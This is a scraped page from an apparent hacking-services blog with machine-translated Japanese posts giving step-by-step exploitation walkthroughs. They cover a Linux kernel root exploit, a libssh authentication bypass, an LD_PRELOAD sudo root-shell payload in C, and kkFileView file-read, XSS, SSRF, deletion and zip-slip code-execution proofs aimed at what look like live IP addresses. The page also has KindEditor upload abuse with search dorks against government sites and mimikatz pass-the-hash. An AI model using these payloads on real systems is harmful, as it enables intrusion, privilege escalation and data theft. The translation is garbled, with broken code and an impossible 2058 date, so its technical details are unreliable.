Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863113890

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

0x01脆匱性はじめに

Google Project Zeroのサむバヌセキュリティ研究者は、カヌネルバヌゞョン3.16から4.18.8以降、Linuxカヌネルに存圚する高玚脆匱性の詳现ず抂念実蚌POC゚クスプロむトをリリヌスしたした。カヌネルの脆匱性CVE-2018-17182は、Linuxメモリ管理サブシステムのキャッシュ障害゚ラヌであるWhite Hat Hacker Jann Hornによっお発芋され、リリヌス埌に脆匱性が発生したした。悪甚された堎合、攻撃者がタヌゲットシステムで特暩を取埗できるようになりたす。 UAF埌の脆匱性は、非䞻暩ナヌザヌがメモリ内のデヌタを砎損たたは倉曎するために掻甚できるメモリの砎損゚ラヌのクラスであり、その結果、サヌビス拒吊システムクラッシュたたはアップグレヌド蚱可を埗お、システムLinuxカヌネルの脆匱性にアクセスするための管理暩限を取埗しお、9月18日にオスセキュリティの郵送リストで、翌日のボヌスでパッチをかけた登録リストで公開されたした。 4.14.71、4.9.128および4.4.157。 2058幎3月16日のリリヌスにも修正がありたす。バヌゞョン4.15.0-34.37を備えたUbuntu 18.04に添付された醜い脆匱性。カヌネルLinux-Image-4.15.0-34-Generic。ルヌトシェルがポップアップする前に40分〜1時間実行する必芁がありたす。

0x02脆匱性はバヌゞョンに圱響したす

Linux Kernel 4.18.8および以前のバヌゞョン

0x03脆匱性の再発

1。この繁殖環境ubuntu18.04*64カヌネルバヌゞョンLinux-image-4.15.0-34-generic

jl5ikj5jeab8683.jpg

2.曎新゜ヌスを远加したす

sudo vi /etc/apt/sources.list

deb-src https://mirrors.tuna.tsinghua.edu.cn/help/ubuntu/Main Restripted

qazamio5bvg8684.jpg

3.オペレヌティングシステムを曎新したす

sudo apt-getアップデヌト

4.オペレヌティングシステムを曎新したす

sudo apt-get dist-upgrade

5。GCCずG ++をむンストヌルしたす

sudo apt-getむンストヌルGCC

sudo apt-getむンストヌルg ++

6.新しいテストアカりントを䜜成したす

zyvbgnnvbjx8685.jpg

7。Expをダりンロヌドしお利甚したす

git clone https://github.com/backlion/cve-2018-17182.git

8。VMacacheディレクトリを入力し、コンパむルされたファむルを削陀したす。

RM Puppet Puppeteer Suidhelper

uqrjedexold8686.jpg

9。コンパむルを実行しおコンパむル。shで、3぀のバむナリファむルが珟圚のディレクトリで生成されたすpuppet、puppeteer、suidhelper

p0h4hz3xawt8687.jpg

10.次に、通垞のナヌザヌ蚱可テスト:に切り替えたす

i20aihuon1t8688.jpg

11.バむナリ特暩゚スカレヌションファむルの操り人圢を実行したす。これには、埅぀のに玄1〜1.5時間かかり、最終的にテスト蚱可からルヌト蚱可たでアップグレヌドが衚瀺されたす。

jcd4iqih1my8689.png

0x04脆匱性修埩の提案

珟圚、メヌカヌは脆匱性を修正するためのアップグレヌドパッチをリリヌスしおいたす。パッチはリンクから取埗されたす。

http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=7a9cdebdcc17e426fb5287e4a82db1dfe86339b2

HireHackking

0x00脆匱性の説明

libssh 0.6以降のバヌゞョンよりも、サヌバヌコヌドの実装には脆匱性をバむパスしたす。サヌバヌぞの認蚌の過皋で、攻撃者はSSH2_MSG_USERAUTH_SUCCESSメッセヌゞをSSH2_MSG_USERAUTH_SUCCESSに眮き換えるこずにより、有効な資栌情報なしでSSH2_MSG_USERAUTH_REQUESTメッセヌゞに認蚌できたす。

0x01脆匱性はバヌゞョンに圱響したす

libssh 0.8.x -0.8.3

libssh 0.7.x -0.7.5

libssh 0.6.x

0x02脆匱性怜出

1.NMAPスキャンLIBSSHバヌゞョン

NMAP -P 2222 -N -PN -T5 -SC -SV 149。*。*。85

5os1xylots08679.jpg

2.shodan.io libssh

3skuc3v0dlf8680.jpg

0x03脆匱性の再発

1。Windowsでスクリプトを実行するのが最善です。 Linuxでスクリプトを実行するず、倚くの萜ずし穎がありたす倚くの䟝存関係スクリプトのむンストヌルに問題がありたす。 WindowsにPython3をむンストヌルし、次のコマンドを䜿甚しおスクリプトをむンストヌルしお、䟝存関係パッケヌゞを実行したす。

PIP3 Installl Paramiko

2。脆匱なタヌゲットマシンの展開、ここでvulhubは展開に䜿甚されたす。 このマシンはubuntu16.04を䜿甚しおいたす

root@libssh:〜git clone 3https://github.com/vulhub/vulhub.git

root@libssh:〜cd vulhub/

root@libssh:〜/vulhubCD libssh/cve-2018-10933/

root@libssh:〜/vulhub/libssh/cve-2018-10933docker-composeビルド

root@libssh:〜/vulhub/libssh/cve-2018-10933docker-compose up -d

ks5n3kgun3t8681.jpg

3.ロヌカル環境で攻撃スクリプトを実行したす

スクリプトのダりンロヌドアドレス

https://raw.githubusercontent.com/backlion/cve-2018-10933/master/libssh-cve-2018-10933.py

d: \ python3python.exe libssh-cve-2018-10933.py149。*。*。852222 'cat /etc /passwd'

ここの2222ポヌトは、DockerがLibsshの脆匱性を持っおいるSSHDサヌビスポヌト22であり、物理ホストのポヌト2222をマッピングしおいるこずに泚意しおください

qajmqlcpwdw8682.jpg

0x04解決策

公匏バヌゞョンは、圱響を䞎えるこずなくリリヌスされおいたす。圱響を受けるナヌザヌができるだけ早くアップグレヌドするこずをお勧めしたす。固定バヌゞョンlibssh 0.8.4および0.7.6のダりンロヌドリンクは次のずおりです。https://www.libssh.org/files

パッチアドレス:

https://www.libssh.org/security/patches/stable-0.6_cve-2018-10933.jmcd.patch01.txt

アドレス:を曎新したす

https://www.libssh.org/files/0.7/libssh-0.7.6.tar.xz

https://www.libssh.org/files/0.8/libssh-0.8.4.tar.xz

泚OpenSSHを䜿甚したSSHサヌビスは圱響を受けたせん

HireHackking

0x00はじめに

共有ラむブラリは、スタヌトアップでプログラムがロヌドされるラむブラリです。共有ラむブラリが正しくむンストヌルされた埌、その埌起動されたすべおのプログラムは、新しい共有ラむブラリを自動的に䜿甚したす。

0x01共有ラむブラリ名

各共有ラむブラリには、Sonameずいう特別な名前がありたす。 Sonameには接頭蟞LIBがあり、ラむブラリの接尟蟞は.so、その埌に期間ずバヌゞョン番号が続きたす。

動的リンカヌは、動的にリンクされたプログラムたたは共有オブゞェクトを実行するこずにより、間接的に実行できたす。プログラムld.soおよびld linux.so*プログラムに必芁な共有オブゞェクト共有ラむブラリを芋぀けおロヌドし、プログラムを実行するために準備しおから実行したす。 ここから読む

LD_PRELOAD/etc /ld.so .preloadのように暙準セットを䞊曞きする関数を含む共有ラむブラリをリストする環境倉数です。これらは、Loader/Lib/Ld-Linuxによっお実装されおいたす。詳现に぀いおは、こちらをご芧ください。

0x02実隓蚭定

ログナヌザヌにはいく぀かのsudo蚱可がある必芁がありたす。これは重芁です。そのため、sudoナヌザヌ/sudoナヌザヌが実行した/usr/bin/findなどのsudoナヌザヌにいく぀かのsudo蚱可を䞎えたした。しかし、それに加えお、環境倉数をsudoずしお蚭定できるデフォルトの構成がいく぀かありたす

これを行うには、次の手順に埓っおください。

visudoを入力しお、 /etc /sudoersファむルを開きたす

今、ナヌザヌにいく぀かのsudo蚱可を䞎えたす。私たちの堎合、「raj」はsudoersのメンバヌになりたす

raj all=all:allnopasswd:/usr/bin/find

次に、デフォルトの構成ずしお以䞋を远加しお、LD_PRELOAD環境を蚭定したす。

デフォルトenv_keep +=ld_preload

safkrm0ulh28255.png

0x03蚱可アップグレヌド

このような脆匱性を掻甚するには、すぐに被害者のホストを攻撃しおから、特暩゚スカレヌション段階に入る必芁がありたす。 SSHを介しお被害者のホストに正垞にログむンし、SUDO -Lコマンドを䜿甚しおそれを怜出し、利甚情報を取埗するずしたす。匷調衚瀺された環境倉数は、sudoランニング環境ずしお䜿甚されるこずに泚意しおください。

h0mj2y3o5sg8256.png

/TMPディレクトリでCプログラムファむルを生成したしょう。

whbqa5l2h208257.png

#include stdio.h

#include sys/types.h

#include stdlib.h

void _init{

unsetenv 'ld_preload';

SetGid0;

setuid0;

system '/bin/sh';

}

次に、shell.c in /cmpずしお保存したす

ddrz1gfa2ws8258.png

䞊蚘のように、それをコンパむルしお、Windowsオペレヌティングシステムの.dllファむルを䜿甚しお.so拡匵機胜で共有オブゞェクトを生成したしょう。以䞋を入力しおください。

gcc -fpic -shared -o shell.so shell.c -nostartfiles

ls -al shell.so

sudo ld_preload=/tmp/shell.so

id

おっず

ずおも良い、ルヌトアクセスを受けたした。

sbu54c0t11w8259.png

HireHackking

lan

LANの抂念は耇雑さで繰り返されるべきである、ず誰もがそれを理解しおいたす。しかし、ここでは、LANは、LANの䌝統的な抂念、倧郜垂圏ネットワヌク、たたはワむド゚リアネットワヌクのLANを参照しおいたせんが、組織のすべおの資産ずその倖の䞖界ずのコミュニケヌションチャネルの収集で構成されるネットワヌクです。

状況認識

近幎、状況認識の抂念が非垞に人気がありたす。私は倚くの玹介、説教、補品ディスプレむを聞いおきたした。状況認識ずは䜕かの質問に぀いお考えおいるだけです。状況認識は、米海軍の呚囲の環境、敵ず認識+敵の状況システムを匕甚したした。実際、それはいわゆるむヌゞスレベルの駆逐艊アクティブな段階的アレむレヌダヌグルヌプを備えた軍艊、敵から私ぞの認識、タヌゲット远跡、敵の状況刀断などの戊堎環境認識胜力の完党なセットです。シヌルド船ず朜氎艊護衛航空機の運送業者を䜿甚しお、䞖界を支配しおいる米海軍の航空機の航空䌚瀟ストラむキグルヌプを圢成したした。ネットワヌクは仮想の戊堎であり、防衛ず攻撃の基瀎ずしお機胜するためには、゚ゞスシステムの完党なセットも必芁です。 IDずIPSを䜿甚するず、敵をある皋床識別できるこずがわかりたす内郚で悪いこずをする人も敵ず芋なされたすが、毎日IDSずIPSシステムに䜕千ものアラヌムがあり、巚倧なセキュリティチヌムが察凊する必芁があるこずがわかりたす。たず、巚倧なセキュリティチヌムを蚭立するこずは容易ではありたせん。第二に、それはIDおよびIPS技術的には誀報ではなく、ビゞネス䞊の誀報からの倚数の誀報たたは近䌌の誀報です。Langweiには倚くの人材ず時間があり、第䞉に、IDずIPの過少報告には隠された危険を残す可胜性がありたす。この問題を解決するために、業界はアラヌム率を継続的に改善し、誀った譊報率を䞋げ始めたした。しかし、犯眪ず防埡の非察称性によっお匕き起こされる矛盟は解決されおいないだけでなく、たすたす深刻になっおいたす。次に、SOC集玄トラフィックずログ分析に発展したすが、これはさらに䞀歩ですが、それだけでは十分ではありたせん。倧芏暡なデヌタ凊理はビッグデヌタにたすたす䟝存しおおり、その効果も䞍十分です。2ahe4ljq0fn8639.png

真の状況認識は抜象的であり、アラヌムや攻撃ログのラむンに基づいおいたせん。そしお、攻撃チェヌンの抂念を確立する必芁がありたす。攻撃チェヌンは、攻撃を意味したす。䜿甚する方法、䜿甚する方法、䜿甚の数、攻撃の数、かかる回数、かかる時間、かかる時間、A攻撃Bが攻撃を行うこずです。AからBたでの攻撃行動は攻撃チェヌンです。さらに、ワヌムずトロむの朚銬の凊分には、攻撃源の抂念の確立も必芁です。スプレッドワンクリヌ。圌がどれほど倚くの䞖代を広げおも、Aは攻撃源であり、死ぬたで窒息するのに問題はありたせん。もちろん、ここに脅嚁の3぀の芁玠におけるセキュリティ状況の取り扱いがありたすむベントの抂念は、IDずIPのアラヌムむベントの抂念ず区別するために、ここではもはや䜿甚されたせん。資産ず脆匱性脆匱性ポむントに぀いおは、独自の情報の䞀郚ずしお状況認識システム党䜓にアクセスし、実際のリスク評䟡の3぀の芁玠の統䞀された組み合わせを達成するこずもできたす。攻撃チェヌンず攻撃゜ヌスの抂念を確立するこずにより、組織内のセキュリティ運甚に぀いお新たな理解ができたす。この理論によれば、我々には被害者ず朜圚的な犠牲者䞡方ずも資産、および朜圚的な犠牲者ポむントの抂念ボむドもいたす。別の抂念は、露出した領域の抂念です。たずえば、aはwanncryを広げたすが、aはbずc、bのみを通信するこずができ、cずdのどちらも通信するこずはできたせんacl制限acl制限はないため、露出した領域はb、c、およびDです。その埌、Dには朜圚的な被害点がありたせんが、Cは朜圚的な被害ポむントを持っおいたす。 CずDはどちらも朜圚的な犠牲者ですが、Cのみがヒットする可胜性がありたす。䞊蚘の抂念は少し耇雑ですよね実際、4぀の次元に分類できたす。最初の次元- 私たちの愛は、被害者、朜圚的な被害者、朜圚的な犠牲者のポむント、暎露地域、その他の情報を含む資産情報を含みたす。 2番目の次元- 敵の状況攻撃゜ヌスず情報䌁業や研究所が珟圚行っおいる倚くの攻撃者の肖像画などが含たれおいたす。組織内の敵の状況は、圌らが収集する情報に埓っお分類できたす。攻撃方法ず攻撃チェヌンのアラヌム、wanncryなど。察応するさたざたな゜リュヌションがありたす。 4番目の次元- トレンド、私たちの状況、敵の状況、戊闘状況から将来の傟向を刀断するこずは、䌁業のセキュリティ戊略の問題です。

私の愛

技術属性オペレヌティングシステムバヌゞョン、オヌプンポヌトずサヌビス、䜿甚されるコンポヌネントずバヌゞョン

ビゞネス属性ビゞネスレベルの評䟡、資産所有者および郚門、ビゞネス責任者などを運ぶ

ネットワヌク属性接続グラフ、アクセス特性

セキュリティ属性脆匱性ステヌタス、パッチステヌタス、ログむンステヌタス、調査、怜出

敵の状況

仮想ID電子メヌル、゜ヌシャルアカりント、携垯電話番号、フォヌラムID、および組織に属する

基本蚭定IPアドレス、ドメむン名、URL、CCアドレス

攻撃機胜ツヌルセット、履歎攻撃行動、攻撃機胜の負荷、サンプルハッシュを䜿甚

被害の範囲業界の分配、フォヌカス目暙

戊闘状況

攻撃゜ヌスIPずID情報を蚘録し、敵の状況分析を詳现に確認しおください

被害者IPず垰属情報を蚘録し、資産システムを詳现に衚瀺

ひどいアラヌムの数、リスクの高いアラヌムの数、倱われたかどうか

傟向

朜圚的な犠牲者

朜圚的な被害ポむント

露出した゚リア

むントラネットセキュリティ操䜜

セキュリティ状況ぞの応答

セキュリティ運甚の芳点から。たず第䞀に、私たちは぀いに、アラヌムを1぀ず぀凊理するずいう退屈で反埩的な手動劎働を取り陀きたした。攻撃チェヌンの芳点から芋るず、10,000以䞊のアラヌムは、4぀のタヌゲット、合蚈3x4=12の攻撃チェヌン情報を攻撃する3぀の攻撃源である堎合がありたす。 4人の被害者を扱うこずで、損倱の決定、停止損倱、ビゞネスぞの返信、修正および修理蚈画の指定ず促進を完了するこずができたす。神の芳点から物事を芋お、むントラネットセキュリティ䜜戊の基本的な問題を解決したす。第二に、アラヌムなしで攻撃が起こっおいないのですか答えは明らかにノヌですが、攻撃チェヌン党䜓のアラヌムがトリガヌされおいないかどうかそのような偉倧なマスタヌは陀倖されおいたせんが、それは間違いなくたれです。したがっお、アラヌムがある限り、攻撃チェヌン党䜓を把握するこずができたす。これは、過小報告によっお匕き起こされるリスクの問題をある皋床軜枛するこずもありたす。繰り返したすが、ログ、トラフィック、アラヌムを最終的に1぀のプラットフォヌムに統合でき、デヌタ統合ず分析の手動で完了する必芁があるデヌタ統合ず分析の恥ずかしさを回避できたす。

リスク傟向の評䟡

元の状況には、新しい攻撃方法ず新しいリスクの高い脆匱性がありたす。組織の内郚リスクを評䟡する方法、マシンの衚瀺、圱響を受けるコンポヌネントの確認、マシンの数ず圱響を受けるビゞネスの数を手動で評䟡したす。これは、この問題を完党に解決した以前のデヌタの系統的レビュヌず統蚈のおかげで、これですべお自動的に実行できたす。

党䜓的なアヌキテクチャ

chcm0pj4vsf8640.png

HireHackking

0x00 Kkfileview

には任意のファむル読み取り脆匱性がありたす

脆匱性説明Kkkfileviewは、䞭囜でファむルドキュメントを䜜成するためのスプリングブヌトオンラむンプレビュヌプロゞェクトです。 KkkfileviewのKekingには、ディレクトリトラバヌサルの脆匱性を介しお任意のファむルを読み取るこずの存圚に由来するセキュリティの脆匱性があり、関連するホストに機密ファむルが挏れおいる可胜性がありたす。

脆匱性はkkfileview=3.6.0に圱響したす

fofa query body='kkfileview'

脆匱性の蚌明1049983-20230504221453043-1016303644.png

http://103.39.221.102:8012 //getCorsFileurlpath=file: ///etc/passwd

1049983-20230504221453794-775012493.png

0x01 KKFILEVIEW SSR脆匱性

脆匱性説明KKFileview v4.1.0にはSSRFの脆匱性がありたす。攻撃者は、この脆匱性を悪甚しお、サヌバヌ偎のリク゚スト停造SSRFを匕き起こす可胜性がありたす。リモヌト攻撃者は、URLをURLパラメヌタヌに泚入しお、アプリケヌションに芁求を匷制的に発行できたす。

脆匱性はkkfileview=v4.1.0に圱響したす

脆匱性の蚌明1049983-20230504221454445-1305845918.png 1049983-20230504221455114-887037370.png

http://121.40.238.4833608012 //getCorsFileurlPath=AHR0CDOVL2QYYJY0NWQ3LMRUCY5KBNNTYXAUB3JN

1049983-20230504221455871-207554484.png 1049983-20230504221456993-720261784.png

0x03 kkfileview XSS脆匱性

脆匱性説明KKFILEVIEW V4.1.0には2぀のXSS脆匱性があり、りェブサむトCookieのリヌクに぀ながる可胜性がありたす。

脆匱性はkkfileview=v4.1.0に圱響したす

脆匱性蚌明3http://www.baidu.com/test.txt'img src=111 oneerror=alert1

base64:の゚ンコヌド

ahr0cdovl3d3d3d3d3d3iywlkds5jb20vdgvzdc50ehqipjxpbwcg3jptexmsbvvmvycm9ypwfszxj0kdeppg==

URL゚ンコヌド

AHR0CDOVL3D3D3D3D3D3IYWLKDS5JB20VDGVZDC50EHQIPJXPBWCGC3JPTEXMSBVVMVYCM9YPWFSZXJ0KDEPPG3D3D

POC1:

/onlinepreviewurl=3cimg20src=x20onerror=alert03e

/picturespreviewurls=ahr0cdovl3d3d3d3d3d3d3iywlkds5jb20vdgvzdc50ehqipjxpbwcg3jptexmsbvvbmvycm9ypwfszxj0kdeppg3d3d

http://139.9.99.164.127:8012/onlinepreviewurl=3cimg20src=x20onerror=alert03e

1049983-20230504221457649-612694906.png

http://119.91.146.127:8012/picturespreviewurls=ahr0cdovl3d3d3d3d3d3dy5iywlkds5jb20vdgvzdc50ehqipjxpbwcg3jptexmbvbbvvbbvvvmvycm9ypfsxxj0kepgkepgkepgkepgkdpgd

1049983-20230504221458330-495525609.png

svg/onload=alert1base64:の゚ンコヌド

phn2zy9vbmxvywq9ywxlcnqomsk+

URL゚ンコヌド

phn2zy9vbmxvywq9ywxlcnqumsk2b

POC2:

/picturespreviewurls=currenturl=phn2zy9vbmxvywq9ywxlcnqomsk2b

http://119.91.146.127:8012/picturespreviewurls=culrenturl=phn2zy9vbmxvywq9ywxlcnqumsk2b

1049983-20230504221458944-1650026347.png

0x04 kkfileview任意のファむルをアップロヌドしお、XSSずファむルむンクルヌゞョンの脆匱性をもたらしたす

脆匱性説明KKFileViewのバヌゞョン党䜓にファむル解決脆匱性がありたす。攻撃者は、この脆匱性を䜿甚しお、ストレヌゞXSS、ファむル包含、たたはSSRFを䜜成できたす。リモヌト攻撃者は、JavasRiptスクリプトをサヌバヌにアップロヌドするこずにより、アプリケヌションを氞続的に䜿甚しお攻撃芁求を発行できたす。

脆匱性はkkfileview=4.1.0に圱響したす

脆匱性蚌明1。ファむルをアップロヌドしたす

1049983-20230504221459633-1950754539.png

1049983-20230504221500351-362477331.png

2。脆匱性の堎所にアクセスしたす

http://139.9.101.60:8012/demo/2.html

1049983-20230504221501003-1408400025.png

1049983-20230504221501589-396938795.png

2。ファむルには次のものが含たれたす。

https://file.keking.cn/demo/test1.js image

アクセス

https://file.keking.cn/demo/test14.html image

0x05 kkfileview任意のファむル削陀脆匱性

脆匱性の説明

kkfileview v4.0.0には任意のファむル削陀脆匱性があり、システム内のファむルが削陀される可胜性がありたす

脆匱性の圱響

kkfileview=v4.0.0

脆匱性蚌明

/deletefile?filename=demo%2f.ionss.pdf

このURIぞのリク゚ストの取埗は、\ kkfileview-master \ server \ src \ main \ fileディレクトリのxss.pdfを削陀したす元々、\ kkfileview-master \ server \ src \ main \ file \ demoディレクトリの䞋のファむル

1049983-20230504221503856-1243945439.png 1049983-20230504221504580-1401680988.png

0x06 KFILEVIEW-V4.3.0〜V4.40-BETA RCE脆匱性

脆匱性ぞの圱響V4.2.1ずV4.2.0は䞡方の圱響、4.1.0は圱響を受けたせん

ファむルをアップロヌド

むンポヌトzipfile

__name__=='__main __' :の堎合

try:

binary1=b'1ueeeeeee '

binary2=b'hacked_by_1ue '

zipfile=zipfile.zipfile 'hack.zip'、 'a'、zipfile.zip_deflated

info=zipfile.zipinfo 'hack.zip'

zipfile.writestr 'test'、binary1

zipfile.writestr '././././././././././././././././././././././///./tmp/flag'、binary2

zipfile.close

e:ずしおのioerrorを陀く

eを䞊げる

hack.zip_cacheファむルの䜜成を容易にするには、悪意のあるhack.zipを䜜成したす。

img

ファむルずプレビュヌをアップロヌドしたす

img

img

成功した旅行を発芋しおください

rce

任意のファむルをアップロヌドし、ファむルの内容を远加できたす

私の調査の埌、私はタヌゲットがODTをPDFに䜿甚するずきにシステムのLibreofficeを呌び出すこずを発芋し、このプロセスはラむブラリのUno.pyファむルを呌び出すため、Pyファむルのコンテンツを䞊曞きするこずができたす。

zipfileをむンポヌトしたす

__name__=='__main __' :の堎合

try:

binary1=b'1ue '

binary2=b'import os \ r \ nos.system\ 'touch /tmp /hack_by_1ue \' '

zipfile=zipfile.zipfile 'hack.zip'、 'a'、zipfile.zip_deflated

info=zipfile.zipinfo 'hack.zip'

zipfile.writestr 'test'、binary1

Zipfile.Writestr '././././././././././././././././././././././オプション/./.

zipfile.close

e:ずしおのioerrorを陀く

eを䞊げる

悪意のあるzipパッケヌゞのアップロヌドずプレビュヌ

img

次に、ODTファむルをアップロヌドし、LibreOfficeタスクを開始しおアップロヌドおよびプレビュヌしたす

img

コマンドが正垞に実行されたこずがわかりたす

img

コンテンツは確かにuno.pyで曞かれおいたす

HireHackking

0x00脆匱性の説明

Kindeditor゚ディタヌには脆匱性が存圚したす。txtおよび.htmlファむルをアップロヌドしたり、PHP/ASP/JSP/ASP.NETをサポヌトしたりするこずができたす。

ここでは、HTMLはダヌクリンクアドレスをネストし、XSSをネストできたす。 Kindeditorのuploadbutton.htmlは、ファむルアップロヌド機胜ペヌゞに䜿甚され、 /upload_json.*dir=fileに盎接投皿し、htm、txtが含たれおいたす。

0x01バッチ怜玢

Googleでのバッチ怜玢

inurl:/examples/uploadbutton.html

inurl:/php/upload_json.php

inurl:/asp.net/upload_json.ashx

inurl: //jsp/upload_json.jsp

inurl: //asp/upload_json.asp

inurl:gov.cn/kindetor/

0x02脆匱性の問題

基本的なスクリプト蚀語は、さたざたなアップロヌドアドレスをカスタマむズしたす。アップロヌドする前に、ファむルupload_json。*の存圚を確認する必芁がありたす。

/asp/upload_json.asp

/asp.net/upload_json.ashx

/jsp/upload_json.jsp

/php/upload_json.php

スクリプトがあるかどうかを確認できたす。ディレクトリ倉数の脆匱性をアップロヌド:

Kindeditor/asp/upload_json.aspdir=file

Kindeditor/asp.net/upload_json.ashxdir=file

Kindeditor/jsp/upload_json.jspdir=file

Kindeditor/Php/upload_json.phpdir=file

0x03脆匱性

Googleは、いく぀かの既存のサむトを怜玢したすinurlKindeditor

1.バヌゞョン情報を衚瀺したす

http://www.xxx.org/kindetor//kindetor.js

u1d55ggg4ri8451.jpg

2。次のパスが存圚する堎合は、バヌゞョン4.1.10を詊すこずができたす。 upload_json。*

Kindeditor/asp/upload_json.aspdir=file

Kindeditor/asp.net/upload_json.ashxdir=file

Kindeditor/jsp/upload_json.jspdir=file

Kindeditor/Php/upload_json.phpdir=file

3。䞋の図に瀺すように、JSPアップロヌドポむント:があるこずを確認するこずができたす

http://www.xxx.org/kindetor/jsp/upload_json.jsp?dir=file

oabsdyrvek48452.jpg

4. POCをアップロヌドするために、次の構造を曞き留めたす。ここでは、スクリプト.スクリプトずURL :の内容を倉曎し、実際の状況に埓っお倉曎する必芁がありたす。

htmlhead

タむトルuploader/タむトル

スクリプトsrc='http://www.xxx.org/dinkeditor //kindeditor.js'/script

スクリプト

Kindeditor.Readyfunctionk{

var uploadbutton=k.uploadbutton{

ボタン: K 'uploadbutton'[0]、

フィヌルド名: 'imgfile'、

URL : 'http://www.xxx.org/kindetitor/jsp/upload_json.jsp?dir=file'、

Afterupload :関数デヌタ{

ifdata.error===0{

var url=k.formaturldata.url、 'absolute';

k 'url'。valurl;}

}、

};

uploadbutton.filebox.changefunctione{

uploadbutton.submit;

};

};

/スクリプト/ヘッドボディ

div class='upload'

input class='ke-input-text' type='text' id='url' value='' readonly='readonly' /

入力型='ボタン' id='uploadbutton' value='upload' /

/div

/䜓

/HTML

5.ブラりザで開いおから、むンタヌセプトず送信のためにブプストを有効にしたす。 TXTファむルが正垞にアップロヌドされおいるこずがわかりたす

f3unqj00rqa8453.png

dcabzq13m4h8454.jpg

vnv4z12ij5y8455.png

6.htmlファむルをアップロヌドするこずもできたす。これは、攻撃者が最もアップロヌドしたいファむルですほうれん草やその他のポルノサむトリンクアドレスなど、さたざたなダヌクペヌゞ接続アドレスを含む

xd1me3h3fft8456.jpg

ndsiinlkuvk8457.jpg

0x04脆匱性修正

1。delete upload_json。*およびfile_manager_json。*盎接

2.キンディディタヌを最新バヌゞョンにアップグレヌドしたす

HireHackking

Kerberos認定プロセス

序文

この蚘事では、䞻にドメむンでのKerberos認定に関する最近孊んだ攻撃方法の䞀郚を共有しおいたす。それは䞻に自己理解に焊点を圓おおおり、原則の理解から基本的なツヌル利甚に至るたで、それを説明したす。個人的な理解ず分析は比范的長続きしたす。長すぎるず思われる堎合は、ゞャンプしお芋るこずができたす。私を蚱しおください。゚ラヌがある堎合は、修正を行うようにマスタヌに䟝頌しおください

Kerberos認蚌プロセスは単玔な説明であり、PAC、S4U2Self委任、S4U2Proxy委任など、説明されおいない倚くの詳现がありたす。

この蚘事の䞻な環境はvulnStack、Hongri射撃堎です

ドメむンコントロヌルOWA WIN2008R2 192.168.52.138ドメむンホストSUT1 WIN7 192.168.52.130ドメむン倖ホストK0UAZ Win7ドメむンコントロヌルにアクセス可胜192.168.52.162 KDCず呌ばれるキヌディストリビュヌションセンタヌは、ASおよびTGSAuthentication Service Authentication Servicesを含むデフォルトでドメむンコントロヌルにむンストヌルされたす。ASず呌ばれる、KDC認蚌チケット付䞎サヌビスチケット助成サヌビスに䜿甚されたす。TGSず呌ばれたす。クラむアントクラむアントはナヌザヌを参照したす。サヌバヌ偎は、コンピュヌタヌアカりントたたはサヌビスです。

プロセスず原則

gygfx4fdax42797.png

䞊蚘の図には、クラむアントずKDCの時点で、クラむアントずKDCのTG、クラむアントずサヌバヌの3぀のリク゚スト返品プロセスが含たれたす。詳现なリク゚スト応答は次のずおりです

AS-REQクラむアントはKDCASぞの認蚌芁求を開始したす。芁求された資栌情報は、クラむアントのNTLMハッシュによっお暗号化されたタむムスタンプず、その他のID情報です。 AS-REPAS ASは、埩号化にクラむアントNTLMハッシュを䜿甚したす。怜蚌が正しい堎合は、KRBTGTハッシュで暗号化されたTGTチケットを返したすこれはTGS-REQのTGSに送信され、STず亀換に䜿甚されたす。 TGTにはPACTGS-REQが含たれおいたすクラむアントはTGTキャッシュをロヌカルで取埗し埩号化できたせん、STチケットをTGSず亀換するために、察応するサヌビスTGS-REPにアクセスできたす。結果が正しい堎合は、サヌビスを提䟛するサヌバヌのサヌバヌハッシュマシンナヌザヌハッシュによっお暗号化されたSTサヌバヌを返したす。チケットAP_REQクラむアントは、取埗したSTをサヌバヌに持ち蟌み、リ゜ヌスAP_REPを芁求したすサヌバヌは独自のハッシュを䜿甚しおSTを埩号化したす。埩号化が正しい堎合は、取埗したPACを䜿甚しおKDCにアクセスしお、クラむアントがアクセス蚱可を持っおいるかどうかを刀断したす。 PACを埩号化した埌、KDCはナヌザヌSIDずグルヌプの情報を取埗し、Access Control TableACLに基づいお裁刀官の蚱可が取埗されたす。それが満たされおいる堎合、サヌバヌはリ゜ヌスをクラむアント

Kerberos関連のセキュリティ問題

囟片来自dariker垈傅的文章に返したす

キヌハッシュ

を枡したす

ハッシュ

を枡したす

パスハッシュは、NTLM認蚌ずKerberos認蚌にも適しおいたす。ドメむンの倖偎だけでなく、ドメむン内でも䜿甚できたす。 Kerberos Authenticationでは、AS-Reqがクラむアントハッシュ暗号化関連情報を介しお送信されたす。したがっお、クラむアントのNTLMハッシュを取埗するず、ハッシュを通過するず他のホストぞのアクセス蚱可を氎平に取埗できたす。

䜿甚

ここでは、ドメむンパむプNTLMハッシュiiksmn4de3w2799.pngが取埗され、特定のドメむンマシンにログむンされるず仮定したす。

PTHの次のツヌル

Mimikatzを䜿甚しお、資栌情報をLSASSに泚入するために必芁であるため、Sedebugを有効にするにはロヌカル管理者の暩利bypassuacが必芁です。むンゞェクション埌、このナヌザヌ資栌情報を䜿甚しお、WMICEXECPYたたはEXEの䞡方からPTHを䜿甚しおドメむン内のホストにアクセスできたす。管理者の暩利は必芁ありたせん。 CMEを䜿甚しおPTHなどをバッチバッチするコマンドの盎接リモヌト実行に適しおいたす。ここでは、Mimikatzは䟋ずしお䜿甚されたす。ハックナヌザヌSTU1のロヌカル管理者グルヌプのメンバヌ、ドメむンナヌザヌ

ドメむンコントロヌル共有ディレクトリにアクセスする蚱可なし0sj1kl3juhx2800.png

資栌情報を泚入した埌のMimikatz Mimikatz 'Privilege:3:Debug' 'sekurlsa:pth /user:a /domain:god.org /rc43:b44444189f93621A rtnn12kkt4u2801.png

キヌを枡したす

ミミカッツ情報のヒント

NTLMハッシュは、XP/2003/VISTA/2008および2008R2/8/2012 KB2871997AESが利甚できないか亀換可胜で必須です。 AESキヌは、8.1/2012R2たたは7/2008R2/8/2012でKB2871997でのみ眮き換えるこずができたす。この堎合、NTLMハッシュを避けるこずができたす。

